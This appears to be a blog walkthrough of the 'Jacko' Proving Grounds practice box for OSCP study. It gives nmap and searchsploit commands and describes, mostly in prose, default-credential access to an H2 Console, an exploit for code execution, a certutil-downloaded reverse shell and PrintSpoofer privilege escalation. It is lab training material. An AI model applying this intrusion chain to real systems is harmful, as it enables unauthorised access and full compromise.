Jacko is part of the Proving Grounds paid subscription, Practice. It’s also part of the OSCP like boxes list, which means it is great to practice on for those trying to study up and prepare for the OSCP certification.
This box has an OffSec rating of Intermediate, whilst the OffSec community rated it as Hard. Let’s get stuck in.
We start with nmap
sudo nmap -sC -sV -p- 192.168.247.66 -oA nmap/full
We first test null sessions and anonymous logins for port 445 SMB but there are none. We move to the web apps on ports 80 and 8082 and are presented with the following;
And on port 8082..
We can tell from the support documents and some general prodding that it looks like we are dealing with H2 Console. It’s a java-based management tool for databases. I personally have never played around with it before. I try some default passwords, including no password, and we managed to connect.
The user’s section seems juicy, but there is nothing of interest there. We do now have an exact version number so we check searchsploit.
searchsploit h2
We have a hit for our version, which looks promising. We make a copy.
searchsploit -m java/local/49384.txtWe take a read of the details and also come across this website outlining the poc. There is even a helpful video down the bottom which also shows the user dumping in the contents of the exploit straight into the text area of the app. So let’s do that because we are impatient.
And we get code execution!
Let’s play around with the inputs to enumerate a bit more
Let’s start the fun by creating a reverse shell. I named my port 445.exe as I am going to set up my listener on port 445 also.
Start our trusty web server…
Let’s use certutil to download the file. I had a lot of issues with syntax, so it’s important to experiment. Note the double slashes.
And then execute the reverse shell.
And we get that lovely little feeling.
I could not execute a number of binaries from my path, so I had to change directories to the C:\Windows\system32 folder and run most binaries from there, including systeminfo and whoami.
We have the SeImpersonatePrivilege enabled. This is always my first check when landing on a box. Juicy Potato will not work on this machine as its build number is too recent. For that we can use PrintSpoofer, so let’s upload that.
We execute and get system!
